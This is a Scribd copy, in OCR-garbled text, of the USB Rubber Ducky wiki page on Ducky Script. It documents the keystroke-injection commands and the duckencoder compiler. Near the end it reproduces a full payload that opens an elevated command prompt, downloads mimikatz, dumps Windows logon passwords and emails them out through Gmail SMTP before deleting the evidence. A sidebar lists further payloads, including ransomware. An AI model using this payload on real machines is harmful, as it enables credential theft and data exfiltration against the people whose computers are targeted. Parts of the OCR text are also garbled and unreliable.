Open navigation menu
Close suggestions
Search
Search
en
Change Language
Upload
Sign in
Sign in
Download free for days
0 ratings
0% found this document useful (0 votes)
448 views
8 pages
Commands Ducky
commands for usb ruber ducky
Uploaded by
Brandon Brink
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content,
claim it here
.
Available Formats
Download as PDF or read online on Scribd
Download
Save
Save Commands Ducky For Later
Share
0%
0% found this document useful, undefined
0%
, undefined
Print
Embed
Report
0 ratings
0% found this document useful (0 votes)
448 views
8 pages
Commands Ducky
commands for usb ruber ducky
Uploaded by
Brandon Brink
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content,
claim it here
.
Available Formats
Download as PDF or read online on Scribd
Carousel Previous
Carousel Next
Download
Save
Save Commands Ducky For Later
Share
0%
0% found this document useful, undefined
0%
, undefined
Print
Embed
Report
Download
Save Commands Ducky For Later
You are on page 1
/ 8
Search
Fullscreen
@ hakSdarren / USB-Rubber-Ducky (Public <> Code © Issues 107 T1} Pullrequests 17 = © Actions (Projects 2 0 Wiki Duckyscript Jump to bottom Didikandriant edited this page on Aug 6, 2021 - 5 revisions 1 © Ducky Script Ducky Script is the language of the USB Rubber Ducky. Writing scripts for can be done from any common ascii text editor such as Notepad, vi, emacs, nano, gedit, kedit, TextEdit, etc Syntax Ducky Script syntax is simple. Each command resides on a new line and may have options follow. Commands are written in ALL CAPS, because ducks are loud and like to quack with pride. Most commands invoke keystrokes, key-combos or strings of text, while some offer delays or pauses. Below is a list of commands and their function, followed by some example usage. Note: In the tables below //n// represents a number and //Char// represents characters A-Z, a-z. REM Similar to the REM command in Basic and other languages, lines beginning with REM will not be processed. REM is a comment ‘Command REM REM The next three lines execute a command pronpt in Windows ure STRING cmd ENTER QDEFAULT_DELAY or DEFAULTDELAY DEFAULT_DELAY or DEFAULTDELAY is used to define how long (milliseconds) to wait between each subsequent command, DEFAULT_DELAY must be issued at the beginning of the ducky script and is optional. Not specifying the DEFAULT_DELAY will result in faster execution of ducky scripts. This command is mostly useful when debugging, Command Parameters DEFAULT_DELAY 0.-> DEFAULTDELAY —0.-> DEFAULT_DELAY 100 REM delays 10@ms between each subsequent command sequence DELAY DELAY creates a momentary pause in the ducky script. It is quite handy for creating a moment of pause between sequential commands that may take the target computer some time to process. DELAY time is specified in milliseconds from 1 to 10000. Multiple DELAY commands can be used to create longer delays. Command Parameters DELAY O.-> DELAY 500 REM will wait Seams before continuing to the next conmand. STRING STRING processes the text following taking special care to auto-shift. STRING can accept a single or multiple characters. Command Parameters STRING an2A.Z0.9 !)” "5 <>. 2/\and pipeure DELAY 5e0 STRING notepad. exe ENTER DELAY 1000 STRING Hello World! WINDOWS or GUI Emulates the Windows-Key, sometimes referred to as the Super-key. Command Optional Parameters cul Single Char WINDOWS Single Char cure REM will hold the Windows-key and press r, on windows systems resulting in the Run menu MENU or APP Emulates the App key, sometimes referred to as the menu key or context menu key. On Windows systems this is similar to the SHIFT F10 key combo, producing the menu similar to a right-click. Command APP. MENU cur 4 MENU STRING v STRING d. //Switch to desktop, pull up context menu and choose actions v, then d toggles displaying Windows desktop icons// SHIFTUnlike CAPSLOCK, cruise control for cool, the SHIFT command can be used when navigating fields to select text, among other functions. Command Optional Parameter DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, SHIFT DOWNARROW, LEFTARROW, RIGHTARROW, TAB SHIFT INSERT REM this is paste for most operating systems ALT Found to the left of the space key on most keyboards, the ALT key is instrumental in many automation operations. ALT is envious of CONTROL Command Optional Parameter AUT END, ESC, ESCAPE, F1..F12, Single Char, SPACE, TAB urs DELAY 50 STRING notepad. exe ENTER DELAY 100 STRING Hello World ALT STRING s REM alt-f pulls up the File menu and s saves. This two keystroke combo is why ALT is Jealous of CONTROL's leetness and CTRL+S CONTROL or CTRL The king of key-combos, CONTROL is all mighty. Command Optional Parameters CONTROL BREAK, PAUSE, F1...F12, ESCAPE, ESC, Single Char CTRL BREAK, PAUSE, F1...F12, ESCAPE, ESC, Single CharCONTROL ESCAPE REM this is equivalent to the GUI key in Windows Arrow Keys ‘Command DOWNARROW or DOWN LEFTARROW or LEFT RIGHTARROW or RIGHT UPARROW or UP Extended Commands Command Notes BREAK or PAUSE For the infamous combo CTRL BREAK CAPSLOCK Cruise control for cool. Toggles DELETE END When will it ever ESC or ESCAPE You can never HOME There's no place like INSERT NUMLOCK Toggles number lock PAGEUP PAGEDOWN PRINTSCREEN Typically takes screenshots SCROLLLOCK Hasn't been nearly as useful since the GUI was invented SPACE the final frontier TAB not just a colaCommand Notes FN another modifier key REPEAT Repeats the last command n times Command n REPEAT number of times to repeat DOWN REPEAT 100 REM The previous conmand is repeated 100 times (thus performed 101 times total) Compiling Ducky Scripts are compiled into hex files ready to be named inject.bin and moved to the root of a microSD card for execution by the USB Rubber Ducky. This is done with the tool duckencoder. duckencoder is a cross-platform command-line Java program which converts the Ducky Script syntax into hex files. Usage is: As of duckencoder 1.X usage is: usage: duckencode -i [file ..] encode specified file or: duckencode -i [file ..] -o [file ..] encode to specified file For example on a Linux system: java ~jar duckencoder.jar -i exploit.txt -o /media/microsdcard/inject.binREM Author: Pesce REM Date: 10/20/2013 REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset! REM ~ ‘open command prompt with admin privileges DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y ENTER DELAY 300, appropriate mimikatz for architecture STRING powershell if (System IntPtr:Size -eq 4) ( (new-object System.Net WebClient) DownloadFile(http://url to 32bit mimikatz.exe' STEMP%\pw.exe') Jelset (new-object System Net WebClient) DownloadFile(http://url to 64bit mimikatz.exe'6TEMP%\pw.exe’)) ENTER DELAY 5000 REM -- get the passwords and save to c\pwiog txt STRING %STEMP%\pw.exe > c\pwiog.trt & type pwlog.txt ENTER DELAY 2000 STRING privilege-debug ENTER DELAY 1000 STRING sekurlsa:logonPasswords full ENTER DELAY 1000 STRING exit ENTER DELAY 300 STRING del 96TEMP%\pw.exe ENTER DELAY 300 REM ‘email log via gmail STRING powershell ENTER DELAY 300 STRING $SMTPServer = 'smtp.gmail.com! ENTER STRING $SMTPInfo = New-Object Net Mail SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = Strue ENTER STRING SSMTPInfo.Credentials = New-Object System Net NetworkCredential('gmailuser, ‘gmail password’); ENTER STRING ‘$ReportEmail = New-Object System.Net Mail MailMessage ENTER STRING $ReportEmail From = ‘sending email account’ ENTER STRING $ReportEmail-To.Add('email account to send report’) ENTER STRING $Reportémail Subject = "Duck Report’ ENTER STRING SReportEmail.Body = ‘Attached is your duck report’ ENTER STRING ‘$ReportEmail Attachments Add(‘c\pwlog.txt) ENTER STRING $SMTPInfo.Send(SReportEmail) ENTER DELAY 1000 STRING exit ENTER REM ~ -delete and end STRING del c\pwlog txt ENTER DELAY 300 STRING exit ENTER akm, jownload + Pages 154 Find a Page. > Home > Abhi » all > Anti Browser > Attacking Windows At The Logon Screen, Gaining Access To CMD With System Privileges. > Capitals Logo Fun > Change desktop background (wint0) > Change the background to MylittlePony (win10) > Chrome os cosc > Downloads > Dransomware: A ransomware which will encrypt user's data ‘out root privileges in 30 sec’s. » Duckencoder+ Buckysenpt Ducky Script Syntax REM DEFAULT_DELAY or DEFAULTDELAY DELAY STRING WINDOWS or GUI MENU or APP SHIFT AUT CONTROL of CTRL Arrow Keys Extended Commands REPEAT Compiling > Edject_DVD_loop > Export Browser Passwords and email results Show 139 more pages. Clone this wiki locally https: //github.con/hakSdarren/USB-Rubber -Ducky.wiki.git
You might also like
USB-Rubber-Ducky - Ebook - v22.08-2 - Booklet
PDF
100% (1)
USB-Rubber-Ducky - Ebook - v22.08-2 - Booklet
60 pages
Make Your Own USB Rubber Ducky Using A Normal USB Stick - PDF
PDF
60% (5)
Make Your Own USB Rubber Ducky Using A Normal USB Stick - PDF
111 pages
WiFi Pineappling Book Hak5
PDF
100% (10)
WiFi Pineappling Book Hak5
77 pages
Autohotkey Tutorial S
PDF
100% (3)
Autohotkey Tutorial S
63 pages
Haifux Wireless Hacking
PDF
No ratings yet
Haifux Wireless Hacking
70 pages
WiFi Pineapple Generation 6 User Manual Draft
PDF
100% (3)
WiFi Pineapple Generation 6 User Manual Draft
28 pages
Digispark HID Attacks 2020
PDF
100% (2)
Digispark HID Attacks 2020
68 pages
Ducky Attacks
PDF
100% (1)
Ducky Attacks
48 pages
Android Hacking in Kali Linux Using Metasploit Fra
PDF
No ratings yet
Android Hacking in Kali Linux Using Metasploit Fra
8 pages
Usb Rubber Ducky
PDF
100% (3)
Usb Rubber Ducky
37 pages
GUIDE Hacking Android
PDF
100% (1)
GUIDE Hacking Android
34 pages
Preview Power of Burp Suite
PDF
100% (1)
Preview Power of Burp Suite
33 pages
Pranks
PDF
No ratings yet
Pranks
7 pages
Code Execution Reverse Shell Commands
PDF
No ratings yet
Code Execution Reverse Shell Commands
22 pages
Script Termux by JR - Fakee404
PDF
100% (1)
Script Termux by JR - Fakee404
12 pages
How Hackers Use Your IP Address To Hack Your Computer & How To Stop It Null Byte
PDF
100% (1)
How Hackers Use Your IP Address To Hack Your Computer & How To Stop It Null Byte
6 pages
How To Hack Bluetooth, Part 1 - Terms, Technologies, & Security Null Byte - WonderHowTo
PDF
No ratings yet
How To Hack Bluetooth, Part 1 - Terms, Technologies, & Security Null Byte - WonderHowTo
7 pages
Important Github Repositories For Security: Created Tags
PDF
No ratings yet
Important Github Repositories For Security: Created Tags
5 pages
Screen Flash Batch File: or You Can
PDF
No ratings yet
Screen Flash Batch File: or You Can
12 pages
Auto Hotkey Hilfe 1
PDF
No ratings yet
Auto Hotkey Hilfe 1
14 pages
Android Mobile Hacking Using Linux: ISSN: 2454-132X Impact Factor: 4.295
PDF
No ratings yet
Android Mobile Hacking Using Linux: ISSN: 2454-132X Impact Factor: 4.295
4 pages
USB Injectable Script Hacking
PDF
No ratings yet
USB Injectable Script Hacking
22 pages
Aircrack NG (Aircrack NG)
PDF
No ratings yet
Aircrack NG (Aircrack NG)
12 pages
Op New Blood Super Secret Security Handbook
PDF
100% (2)
Op New Blood Super Secret Security Handbook
20 pages
Android Tools For Hacking - A Much Needed Tutorial - Internet Society Malaysia Chapter
PDF
No ratings yet
Android Tools For Hacking - A Much Needed Tutorial - Internet Society Malaysia Chapter
6 pages
Kali Linux On Android Using Linux Deploy - Kali Linux
PDF
No ratings yet
Kali Linux On Android Using Linux Deploy - Kali Linux
6 pages
Hak5 Whitepaper Keystroke Reflection
PDF
No ratings yet
Hak5 Whitepaper Keystroke Reflection
12 pages
How To Perform A Man-In-The-middle (MITM) Attack With Kali Linux - Our Code World-man-In-The-middle
PDF
No ratings yet
How To Perform A Man-In-The-middle (MITM) Attack With Kali Linux - Our Code World-man-In-The-middle
7 pages
Awesome Hacking Resources
PDF
0% (1)
Awesome Hacking Resources
3 pages
Kali Tools List
PDF
No ratings yet
Kali Tools List
24 pages
Downloading Kali Linux
PDF
No ratings yet
Downloading Kali Linux
9 pages
20 Things To Do After Installing Kali Li
PDF
100% (1)
20 Things To Do After Installing Kali Li
19 pages
The Best Linux Distro For Privacy and Security in 2018
PDF
No ratings yet
The Best Linux Distro For Privacy and Security in 2018
11 pages
GitHackTools - Security Toolkit For Pentesters
PDF
No ratings yet
GitHackTools - Security Toolkit For Pentesters
5 pages
Apt-Cache: Kali Linux Metapackages
PDF
0% (1)
Apt-Cache: Kali Linux Metapackages
9 pages
What Is The Use of Kali Linux in Android - Systran Box
PDF
No ratings yet
What Is The Use of Kali Linux in Android - Systran Box
5 pages
Kali Nethunter
PDF
No ratings yet
Kali Nethunter
1 page
Kali Linux Hacking Tutorials - Hack WPA - WPA2 WPS - Reaver - Kali Linux
PDF
0% (1)
Kali Linux Hacking Tutorials - Hack WPA - WPA2 WPS - Reaver - Kali Linux
8 pages
Ducky in
PDF
No ratings yet
Ducky in
1 page
Doskey - Microsoft Docs
PDF
No ratings yet
Doskey - Microsoft Docs
6 pages
Hacking New
PDF
No ratings yet
Hacking New
24 pages
Rubber Ducky Cheat Sheet
PDF
No ratings yet
Rubber Ducky Cheat Sheet
1 page
Rubber Ducky
PDF
No ratings yet
Rubber Ducky
13 pages
51 Android - Rules
PDF
No ratings yet
51 Android - Rules
3 pages
TOR Howto - Using TOR Through A Ssh-Tunnel Blog of Too Many Things
PDF
No ratings yet
TOR Howto - Using TOR Through A Ssh-Tunnel Blog of Too Many Things
14 pages
Mass Pwnage Metasploit
PDF
No ratings yet
Mass Pwnage Metasploit
27 pages
Wireless Hacking
PDF
No ratings yet
Wireless Hacking
12 pages
Optimus Black p970 Official Ics Up
PDF
No ratings yet
Optimus Black p970 Official Ics Up
8 pages
TERMUX
PDF
No ratings yet
TERMUX
1 page
Hacking Telnet
PDF
No ratings yet
Hacking Telnet
5 pages
How To Secretly Copy (Steal) Files From A Computer To A USB Flash Drive
PDF
No ratings yet
How To Secretly Copy (Steal) Files From A Computer To A USB Flash Drive
3 pages
Hacking With Android
PDF
No ratings yet
Hacking With Android
12 pages
IntroToBluetoothHacking CarolinaCon2012
PDF
No ratings yet
IntroToBluetoothHacking CarolinaCon2012
50 pages
LazyKali Kali-Linux Tutorial - Coding Security
PDF
No ratings yet
LazyKali Kali-Linux Tutorial - Coding Security
3 pages
This Virus Deletes All The Content of A Drive..
PDF
No ratings yet
This Virus Deletes All The Content of A Drive..
4 pages
Remote Monitoring System For Cyber Forensic
PDF
No ratings yet
Remote Monitoring System For Cyber Forensic
9 pages
Impact of Ict On Society: CLASS:4S4 TEACHER:Cik Mahsuri
PDF
No ratings yet
Impact of Ict On Society: CLASS:4S4 TEACHER:Cik Mahsuri
11 pages
AutoIt Quickref
PDF
No ratings yet
AutoIt Quickref
3 pages
John The Ripper Tutorial - ...
PDF
No ratings yet
John The Ripper Tutorial - ...
3 pages
All This Comand Use To Type in Notepad
PDF
No ratings yet
All This Comand Use To Type in Notepad
9 pages